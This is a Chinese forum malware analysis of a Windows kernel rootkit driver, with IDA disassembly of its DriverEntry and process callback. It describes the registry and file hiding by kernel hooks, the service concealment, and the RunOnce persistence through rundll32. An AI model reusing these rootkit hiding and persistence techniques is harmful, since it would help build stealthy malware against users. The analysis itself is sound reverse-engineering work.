发表于: 2012-2-28 23:46 10633


2012-2-28 23:46

2、大玩“躲猫猫”,创建服务,实施“乾坤大挪移”修改文件名,躲猫猫之对象HOOK \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES的ParseProcedure CmParseKey实现注册表隐藏。

DriverEntry ===>

流程4:DriverReinitializationRoutine ===>

流程4 ==> 流程1-2:sub_16BFE() ===>
         4-1、如果找到则对NtSetValueKey及NtDeleteKey中对ObReferenceObjectByHandle的调用进行Inlie HOOK,Inline后分别对应调用sub_157F0()及sub_15824()
         4-2、如果没找到则直接SSDT HOOK NtDeleteKey
     5、sub_16AF2(),创建服务,实施“乾坤大挪移”修改文件名,对键HOOK \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES CmParseKey,以实现对服务的隐藏。
     6、sub_10DE4(),HOOK IoDeviceObjctType的IopParseDevice,实现文件保护.


流程4 ==> 流程1-2 ==> 流程3:回调流程sub_108B8() ===>
     1、case userinit:   写入\registry\machine\software\microsoft\windows\currentversion\runonce的键unfd,
                         对应的值为%systemroot%\system32\rundll32.exe %systemroot%\system32\zuefhm.dll,DllRegisterServer"
     2、case explorer:   一些注册表查询设置操作,这里注册表操作较多,有兴趣自己可以跟一下,小弟简单列一下,有下面的这些键
                         \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-                         500\Software\Microsoft\Internet Explorer\Main
                         \REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons                                          \ClassicStartMenu\REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Explorer                         \HideDesktopIcons\NewStartPanel
                         \REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer \REGISTRY\USER\S-1-5-                                 21-823518204-1336601894-1417001333-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
     3、case rundll32:   判断其父进程是否是ExpLorer.exe
     4、case iexplorer:  进行一些计时操作

我们再来看一下HOOK NtDeleteValueKey中对ObReferenceObjectByHandle的调用前如下图:


再来看一下HOOK NtDeleteValueKey、NtSetValueKey后如下图:




INIT:00019380     ; NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
INIT:00019380                     public DriverEntry
INIT:00019380     DriverEntry     proc near
INIT:00019380     SymbolicLinkName= UNICODE_STRING ptr -14h
INIT:00019380     DestinationString= UNICODE_STRING ptr -0Ch
INIT:00019380     DeviceObject    = dword ptr -4
INIT:00019380     DriverObject    = dword ptr  8
INIT:00019380     RegistryPath    = dword ptr  0Ch
INIT:00019380 000                 push    ebp
INIT:00019381 004                 mov     ebp, esp
INIT:00019383 004                 sub     esp, 14h
INIT:00019386 018                 push    ebx
INIT:00019387 01C                 push    esi
INIT:00019388 020                 push    edi
INIT:00019389 024                 push    edx
INIT:0001938A 028                 inc     dl
INIT:0001938C 028                 or      dh, dl
INIT:0001938E 028                 and     edx, ebx
INIT:00019390 028                 test    ah, dh
INIT:00019392 028                 and     dh, 5Eh
INIT:00019395 028                 pop     edx
INIT:00019396 024                 push    [ebp+RegistryPath]
INIT:00019399 028                 call    sub_19260
INIT:0001939E 024                 push    ecx
INIT:0001939F 028                 push    bx
INIT:000193A1 02A                 test    cx, cx
INIT:000193A4 02A                 sub     cx, si
INIT:000193A7 02A                 mov     cx, 1DD6h
INIT:000193AB 02A                 mov     bh, 68h
INIT:000193AD 02A                 xor     cl, bl
INIT:000193AF 02A                 or      ecx, 3F17h
INIT:000193B5 02A                 and     bh, dh
INIT:000193B7 02A                 pop     bx
INIT:000193B9 028                 pop     ecx
INIT:000193BA 024                 xor     eax, eax
INIT:000193BC 024                 cmp     g_ImageFileNameOffset, eax
INIT:000193C2 024                 jnz     short loc_193DD
INIT:000193C4 024                 push    eax
INIT:000193C5 028                 push    eax
INIT:000193C6 02C                 call    sub_192A0
INIT:000193CB 024                 push    eax
INIT:000193CC 028                 push    edx
INIT:000193CD 02C                 push    di
INIT:000193CF 02E                 sub     eax, 0DCCh
INIT:000193D4 02E                 pop     di
INIT:000193D6 02C                 pop     edx
INIT:000193D7 028                 pop     eax
INIT:000193D8 024                 jmp     loc_194A4
INIT:000193DD     ; ---------------------------------------------------------------------------
INIT:000193DD     loc_193DD:                              ; CODE XREF: DriverEntry+42j
INIT:000193DD 024                 push    edi
INIT:000193DE 028                 test    eax, edi
INIT:000193E0 028                 pop     edi
INIT:000193E1 024                 call    near ptr DecodeAllStr
INIT:000193E6 024                 pusha
INIT:000193E7 044                 inc     al
INIT:000193E9 044                 and     dl, bl
INIT:000193EB 044                 or      dx, ax
INIT:000193EE 044                 and     dx, 463Eh
INIT:000193F3 044                 test    dl, 63h
INIT:000193F6 044                 xor     ax, cx
INIT:000193F9 044                 inc     dl
INIT:000193FB 044                 popa
INIT:000193FC 024                 lea     eax, [ebp+DestinationString]
INIT:000193FF 024                 push    offset g_device_ksdrv ; SourceString
INIT:00019404 028                 push    eax             ; DestinationString
INIT:00019405 02C                 call    ds:RtlInitUnicodeString
INIT:0001940B 024                 pushaw
INIT:0001940D 034                 push    edx
INIT:0001940E 038                 test    bx, 1458h
INIT:00019413 038                 or      ax, di
INIT:00019416 038                 add     bh, ch
INIT:00019418 038                 test    bh, al
INIT:0001941A 038                 pop     edx
INIT:0001941B 034                 popaw
INIT:0001941D 024                 lea     eax, [ebp+DeviceObject]
INIT:00019420 024                 xor     esi, esi
INIT:00019422 024                 push    eax             ; DeviceObject
INIT:00019423 028                 push    esi             ; Exclusive
INIT:00019424 02C                 push    esi             ; DeviceCharacteristics
INIT:00019425 030                 lea     eax, [ebp+DestinationString]
INIT:00019428 030                 push    8000h           ; DeviceType
INIT:0001942D 034                 push    eax             ; DeviceName
INIT:0001942E 038                 push    esi             ; DeviceExtensionSize
INIT:0001942F 03C                 push    [ebp+DriverObject] ; DriverObject
INIT:00019432 040                 call    ds:IoCreateDevice
INIT:00019438 024                 cmp     eax, esi
INIT:0001943A 024                 jl      loc_194ED
INIT:00019440 024                 push    ecx
INIT:00019441 028                 push    edx
INIT:00019442 02C                 push    edi
INIT:00019443 030                 test    cx, cx
INIT:00019446 030                 xor     dl, 57h
INIT:00019449 030                 inc     edi
INIT:0001944A 030                 or      ch, 6Fh
INIT:0001944D 030                 pop     edi
INIT:0001944E 02C                 pop     edx
INIT:0001944F 028                 pop     ecx
INIT:00019450 024                 lea     eax, [ebp+SymbolicLinkName]
INIT:00019453 024                 push    offset g_dosdevice_ksdrv ; SourceString
INIT:00019458 028                 push    eax             ; DestinationString
INIT:00019459 02C                 call    ds:RtlInitUnicodeString
INIT:0001945F 024                 push    ebx
INIT:00019460 028                 push    edx
INIT:00019461 02C                 mov     bh, 64h
INIT:00019463 02C                 pop     edx
INIT:00019464 028                 pop     ebx
INIT:00019465 024                 lea     eax, [ebp+DestinationString]
INIT:00019468 024                 push    eax             ; DeviceName
INIT:00019469 028                 lea     eax, [ebp+SymbolicLinkName]
INIT:0001946C 028                 push    eax             ; SymbolicLinkName
INIT:0001946D 02C                 call    ds:IoCreateSymbolicLink
INIT:00019473 024                 cmp     eax, esi
INIT:00019475 024                 mov     [ebp+RegistryPath], eax
INIT:00019478 024                 jge     short loc_19485
INIT:0001947A 024                 push    [ebp+DeviceObject] ; DeviceObject
INIT:0001947D 028                 call    ds:IoDeleteDevice
INIT:00019483 024                 jmp     short loc_194EA
INIT:00019485     ; ---------------------------------------------------------------------------
INIT:00019485     loc_19485:                              ; CODE XREF: DriverEntry+F8j
INIT:00019485 024                 pusha
INIT:00019486 044                 inc     al
INIT:00019488 044                 and     dl, bl
INIT:0001948A 044                 or      dx, ax
INIT:0001948D 044                 and     dx, 463Eh
INIT:00019492 044                 test    dl, 63h
INIT:00019495 044                 xor     ax, cx
INIT:00019498 044                 inc     dl
INIT:0001949A 044                 popa
INIT:0001949B 024                 call    GetNeedSystemRootine
INIT:000194A0 024                 test    al, al
INIT:000194A2 024                 jnz     short loc_194AB
INIT:000194A4     loc_194A4:                              ; CODE XREF: DriverEntry+58j
INIT:000194A4 024                 mov     eax, 0C0000001h
INIT:000194A9 024                 jmp     short loc_194ED
INIT:000194AB     ; ---------------------------------------------------------------------------
INIT:000194AB     loc_194AB:                              ; CODE XREF: DriverEntry+122j
INIT:000194AB 024                 push    cx
INIT:000194AD 026                 push    edx
INIT:000194AE 02A                 sub     dh, al
INIT:000194B0 02A                 add     cx, dx
INIT:000194B3 02A                 inc     cl
INIT:000194B5 02A                 test    ah, cl
INIT:000194B7 02A                 inc     ch
INIT:000194B9 02A                 or      dx, bx
INIT:000194BC 02A                 inc     cx
INIT:000194BE 02A                 xor     dx, dx
INIT:000194C1 02A                 xor     cl, bh
INIT:000194C3 02A                 pop     edx
INIT:000194C4 026                 pop     cx
INIT:000194C6 024                 mov     eax, [ebp+DriverObject]
INIT:000194C9 024                 mov     dword ptr [eax+38h], offset sub_16CD4
INIT:000194D0 024                 push    ecx
INIT:000194D1 028                 push    edx
INIT:000194D2 02C                 push    edi
INIT:000194D3 030                 test    cx, cx
INIT:000194D6 030                 xor     dl, 57h
INIT:000194D9 030                 inc     edi
INIT:000194DA 030                 or      ch, 6Fh
INIT:000194DD 030                 pop     edi
INIT:000194DE 02C                 pop     edx
INIT:000194DF 028                 pop     ecx
INIT:000194E0 024                 push    0               ; ULONG
INIT:000194E2 028                 push    0               ; PVOID
INIT:000194E4 02C                 push    eax             ; struct _DRIVER_OBJECT *
INIT:000194E5 030                 call    DriverReinitializationRoutine
INIT:000194EA     loc_194EA:                              ; CODE XREF: DriverEntry+103j
INIT:000194EA 024                 mov     eax, [ebp+RegistryPath]
INIT:000194ED     loc_194ED:                              ; CODE XREF: DriverEntry+BAj
INIT:000194ED                                             ; DriverEntry+129j
INIT:000194ED 024                 pop     edi
INIT:000194EE 020                 pop     esi
INIT:000194EF 01C                 pop     ebx
INIT:000194F0 018                 leave
INIT:000194F1 000                 retn    8
INIT:000194F1     DriverEntry     endp
.text:000108B8       ; double __stdcall sub_108B8(int ParentId, int pid, char bCreate)
.text:000108B8       sub_108B8       proc near               ; DATA XREF: sub_1132A+2o
.text:000108B8       var_10          = byte ptr -10h
.text:000108B8       var_F           = byte ptr -0Fh
.text:000108B8       ParentId        = dword ptr  8
.text:000108B8       pid             = dword ptr  0Ch
.text:000108B8       bCreate         = dword ptr  10h
.text:000108B8 0 000                 push    ebp
.text:000108B9 0 004                 mov     ebp, esp
.text:000108BB 0 004                 sub     esp, 10h
.text:000108BE 0 014                 push    ebx
.text:000108BF 0 018                 push    esi
.text:000108C0 0 01C                 push    edi
.text:000108C1 0 020                 xor     ebx, ebx
.text:000108C3 0 020                 xor     eax, eax
.text:000108C5 0 020                 lea     edi, [ebp+var_F]
.text:000108C8 0 020                 mov     [ebp+var_10], bl
.text:000108CB 0 020                 cmp     byte ptr [ebp+bCreate], bl
.text:000108CE 0 020                 stosd
.text:000108CF 0 020                 stosd
.text:000108D0 0 020                 stosd
.text:000108D1 0 020                 stosw
.text:000108D3 0 020                 stosb
.text:000108D4 0 020                 jz      loc_10A7D
.text:000108DA 0 020                 cmp     [ebp+pid], 14h
.text:000108DE 0 020                 jb      loc_10A7D
.text:000108E4 0 020                 cmp     g_ImageFileNameOffset, ebx
.text:000108EA 0 020                 jz      loc_10A7D
.text:000108F0 0 020                 lea     eax, [ebp+var_10]
.text:000108F3 0 020                 push    eax             ; char *
.text:000108F4 0 024                 push    [ebp+pid]       ; int
.text:000108F7 0 028                 call    SearchProccessName
.text:000108FC 0 020                 cmp     eax, ebx
.text:000108FE 0 020                 mov     [ebp+bCreate], eax
.text:00010901 0 020                 jz      loc_10A7D
.text:00010907 0 020                 push    edx
.text:00010908 0 024                 push    edi
.text:00010909 0 028                 or      edx, edx
.text:0001090B 0 028                 mov     dl, ch
.text:0001090D 0 028                 cmp     edx, ecx
.text:0001090F 0 028                 and     edx, eax
.text:00010911 0 028                 pop     edi
.text:00010912 0 024                 pop     edx
.text:00010913 0 020                 mov     esi, ds:_stricmp
.text:00010919 0 020                 lea     eax, [ebp+var_10]
.text:0001091C 0 020                 push    offset g_userinit ; "9UT瞋#Q"
.text:00010921 0 024                 push    eax             ; char *
.text:00010922 0 028                 call    esi ; _stricmp
.text:00010924 0 028                 pop     ecx
.text:00010925 0 024                 test    eax, eax
.text:00010927 0 024                 pop     ecx
.text:00010928 0 020                 jnz     short loc_10947
.text:0001092A 0 020                 push    eax
.text:0001092B 0 024                 push    bx
.text:0001092D 0 026                 test    ax, 826h
.text:00010931 0 026                 sub     bl, 12h
.text:00010934 0 026                 test    bx, 3C13h
.text:00010939 0 026                 test    ah, 56h
.text:0001093C 0 026                 cmp     bx, dx
.text:0001093F 0 026                 pop     bx
.text:00010941 0 024                 pop     eax
.text:00010942 0 020                 call    ProcessUserInit
.text:00010947       loc_10947:                              ; CODE XREF: sub_108B8+70j
.text:00010947 0 020                 push    ax
.text:00010949 0 022                 push    cx
.text:0001094B 0 024                 push    edi
.text:0001094C 0 028                 and     al, dl
.text:0001094E 0 028                 or      ch, 3Ah
.text:00010951 0 028                 dec     edi
.text:00010952 0 028                 inc     edi
.text:00010953 0 028                 cmp     ah, bl
.text:00010955 0 028                 xor     ax, ax
.text:00010958 0 028                 cmp     cl, dl
.text:0001095A 0 028                 dec     cl
.text:0001095C 0 028                 pop     edi
.text:0001095D 0 024                 pop     cx
.text:0001095F 0 022                 pop     ax
.text:00010961 0 020                 lea     eax, [ebp+var_10]
.text:00010964 0 020                 push    offset g_explorer_exe ; ")^A琘?]\n?^T?
.text:00010969 0 024                 push    eax             ; char *
.text:0001096A 0 028                 call    esi ; _stricmp
.text:0001096C 0 028                 pop     ecx
.text:0001096D 0 024                 test    eax, eax
.text:0001096F 0 024                 pop     ecx
.text:00010970 0 020                 jnz     loc_10A24
.text:00010976 0 020                 cmp     g_bFirstExplorer, al
.text:0001097C 0 020                 jnz     loc_10A24
.text:00010982 0 020                 push    ebx
.text:00010983 0 024                 add     bx, ax
.text:00010986 0 024                 mov     bx, 6602h
.text:0001098A       loc_1098A:
.text:0001098A 0 024                 and     bh, dl
.text:0001098C 0 024                 pop     ebx
.text:0001098D 0 020                 push    [ebp+bCreate]
.text:00010990 0 024                 call    ProcessExplorer1
.text:00010995 0 020                 test    eax, eax
.text:00010997 0 020                 jl      loc_10A24
.text:0001099D 0 020                 jbe     loc_109B4
.text:000109A3 0 020                 push    eax
.text:000109A4 0 024                 pop     eax
.text:000109A5 0 020                 ja      loc_109B4
.text:000109AB 0 020                 pop     esi
.text:000109AC 0 01C                 fisubr  dword ptr [ecx+7A96ED64h]
.text:000109B2                       db      26h
.text:000109B2 0 01C                 dec     esp
.text:000109B4       loc_109B4:                              ; CODE XREF: sub_108B8+E5j
.text:000109B4                                               ; sub_108B8+EDj
.text:000109B4 0 01C                 mov     g_bFirstExplorer, 1
.text:000109BB 0 01C                 jbe     loc_109DD
.text:000109C1 0 01C                 push    si
.text:000109C3 0 01E                 mov     si, 5C11h
.text:000109C7 0 01E                 pop     si
.text:000109C9 0 01C                 ja      loc_109DD
.text:000109C9       ; ---------------------------------------------------------------------------
.text:000109CF 0 01C unk_109CF       db  70h ; p
.text:000109D0 0 01C                 db 0BAh ; ?
.text:000109D1 0 01C                 db  0Eh
.text:000109D2 0 01C                 dw 8D67h
.text:000109D4 0 01C                 dd 3557B8FDh, 0CBA2EED7h
.text:000109DC 0 01C                 db 0F3h
.text:000109DD       ; ---------------------------------------------------------------------------
.text:000109DD       loc_109DD:                              ; CODE XREF: sub_108B8+103j
.text:000109DD                                               ; sub_108B8+111j
.text:000109DD 0 01C                 mov     b_FinishRegClsid, 1
.text:000109E4 0 01C                 jp      short loc_109FB
.text:000109E6 0 01C                 push    edi
.text:000109E7 0 020                 mov     di, 0B224h
.text:000109EB 0 020                 pop     edi
.text:000109EC 0 01C                 jnp     short loc_109FB
.text:000109EE 0 01C                 xchg    eax, edx
.text:000109EF 0 01C                 clc
.text:000109F0 0 01C                 mov     esi, 34A96CF4h
.text:000109F5 0 01C                 inc     eax
.text:000109F5       ; ---------------------------------------------------------------------------
.text:000109F6 0 01C unk_109F6       db 0C5h ; ?
.text:000109F7 0 01C                 db  2Dh ; -
.text:000109F8 0 01C                 db  3Ah ; :
.text:000109F9 0 01C                 db 0B4h ; ?
.text:000109FA 0 01C                 db  17h
.text:000109FB       ; ---------------------------------------------------------------------------
.text:000109FB       loc_109FB:                              ; CODE XREF: sub_108B8+12Cj
.text:000109FB                                               ; sub_108B8+134j
.text:000109FB 0 01C                 call    ProcessExploerer2
.text:00010A00 0 01C                 pusha
.text:00010A01 0 03C                 test    bx, 0A43h
.text:00010A06 0 03C                 cmp     ch, 6Eh
.text:00010A09 0 03C                 sub     ch, bl
.text:00010A0B 0 03C                 cmp     dx, 7A98h
.text:00010A10 0 03C                 sub     ecx, edx
.text:00010A12 0 03C                 popa
.text:00010A13 0 01C                 push    dword_19178
.text:00010A19 0 020                 call    ProcessExploerer3
.text:00010A1E 0 01C                 mov     esi, ds:_stricmp
.text:00010A24       loc_10A24:                              ; CODE XREF: sub_108B8+B8j
.text:00010A24                                               ; sub_108B8+C4j ...
.text:00010A24 0 01C                 push    eax
.text:00010A25 0 020                 xor     ax, bx
.text:00010A28 0 020                 pop     eax
.text:00010A29 0 01C                 lea     eax, [ebp+var_10]
.text:00010A2C 0 01C                 push    offset g_aRundll32_exe ; char *
.text:00010A31 0 020                 push    eax             ; char *
.text:00010A32 0 024                 call    esi ; _stricmp
.text:00010A34 0 024                 pop     ecx
.text:00010A35 0 020                 test    eax, eax
.text:00010A37 0 020                 pop     ecx
.text:00010A38 0 01C                 jnz     short loc_10A4A
.text:00010A3A 0 01C                 cmp     g_bFirstExplorer, al
.text:00010A40 0 01C                 jz      short loc_10A4A
.text:00010A42 0 01C                 push    [ebp+ParentId]
.text:00010A45 0 020                 call    ProcessRundll32
.text:00010A4A       loc_10A4A:                              ; CODE XREF: sub_108B8+180j
.text:00010A4A                                               ; sub_108B8+188j
.text:00010A4A 0 01C                 jo      short loc_10A62
.text:00010A4C 0 01C                 push    esi
.text:00010A4D 0 020                 mov     esi, 387EF7E0h
.text:00010A52 0 020                 pop     esi
.text:00010A53 0 01C                 jno     short loc_10A62
.text:00010A53       ; ---------------------------------------------------------------------------
.text:00010A55 0 01C byte_10A55      db 0C6h, 71h, 7Dh
.text:00010A58 0 01C                 dd 21D7221Dh, 0C0FF8AF7h
.text:00010A60 0 01C                 db 0Dh, 0A7h
.text:00010A62       ; ---------------------------------------------------------------------------
.text:00010A62       loc_10A62:                              ; CODE XREF: sub_108B8:loc_10A4Aj
.text:00010A62                                               ; sub_108B8+19Bj
.text:00010A62 0 01C                 lea     eax, [ebp+var_10]
.text:00010A65 0 01C                 push    offset g_aIEXPLORE_EXE ; char *
.text:00010A6A 0 020                 push    eax             ; char *
.text:00010A6B 0 024                 call    esi ; _stricmp
.text:00010A6D 0 024                 pop     ecx
.text:00010A6E 0 020                 test    eax, eax
.text:00010A70 0 020                 pop     ecx
.text:00010A71 0 01C                 jnz     short loc_10A7D
.text:00010A73 0 01C                 push    offset dword_19170
.text:00010A78 0 020                 call    ProcessIexplorer
.text:00010A7D       loc_10A7D:                              ; CODE XREF: sub_108B8+1Cj
.text:00010A7D                                               ; sub_108B8+26j ...
.text:00010A7D 0 01C                 pop     edi
.text:00010A7E 0 018                 pop     esi
.text:00010A7F 0 014                 pop     ebx
.text:00010A80 0 010                 leave
.text:00010A81 0 000                 retn    0Ch
.text:00010A81       sub_108B8       endp ; sp-analysis failed


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能力值: ( LV2,RANK:10 )
2012-2-29 10:13
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2012-4-1 15:25
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
2012-4-1 15:54
雪    币: 316
活跃值: (128)
能力值: ( LV7,RANK:110 )
2012-4-23 19:48
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